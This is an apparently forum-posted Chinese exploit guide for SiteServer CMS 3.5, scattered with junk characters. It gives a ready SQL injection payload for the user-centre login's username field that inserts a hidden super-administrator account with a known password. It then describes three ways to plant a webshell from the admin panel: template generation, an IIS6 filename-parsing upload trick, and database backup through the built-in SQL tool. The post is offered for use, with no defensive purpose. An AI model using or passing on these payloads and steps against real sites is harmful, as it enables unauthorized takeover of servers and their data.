经测试秒杀最新的3.5版
, Y: V' g7 r" p# g7 v& h4 Z- {) @stieserver官网:www.siteserver.cn
. i- I2 N! \1 S* Q6 B q: ~5 {EXP:
' {# t9 P6 W3 U: f! K直接访问UserCenter/login.aspx+ U0 N5 K1 k( ^$ O% o
用户名处输入:' o1 s& X4 |: O2 h
7 {4 ^1 v" \0 r123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
) Y) Z+ D* M. p2 f1 q( F密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
* ]) ?8 S$ @# a- l# g& M8 C) C( p之后再访问后台SiteServer/login.aspx用插入的用户登陆
( G% H: }" _6 X. \% t! P" J5 }5 V后台拿webshell的三种方法:7 N# y" R% \. L; l. I4 R
一、
0 {: P0 z% g6 j: \站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
) {& Q( C1 }! o; A4 k二、
$ j' E {) E. I/ s( X* s5 i z" H成员权限-》添加用户-》用户名为:1.asp! v7 k- ]; j% A3 x5 @( ^
http://127.0.0.1/usercenter/; i3 D. o6 v( E7 y
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell4 }% q. r1 f' R$ Y( @
(ps:后台添加用户时不会验证是否含有非法字符)
4 x V/ F% J. v三、4 z7 u0 l; j; ~. U! {! A. D. O
系统工具-》实用工具-》机器参数查看
z! g7 N2 a S% u/ U) [! G1 H可以看到数据库类型、名称,WEB路径
! }2 M. S0 |. G8 j h9 Q系统工具-》数据库工具-》SQL语句查询
. O; A) J5 [& Y: u$ {/ K3 Z; `这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |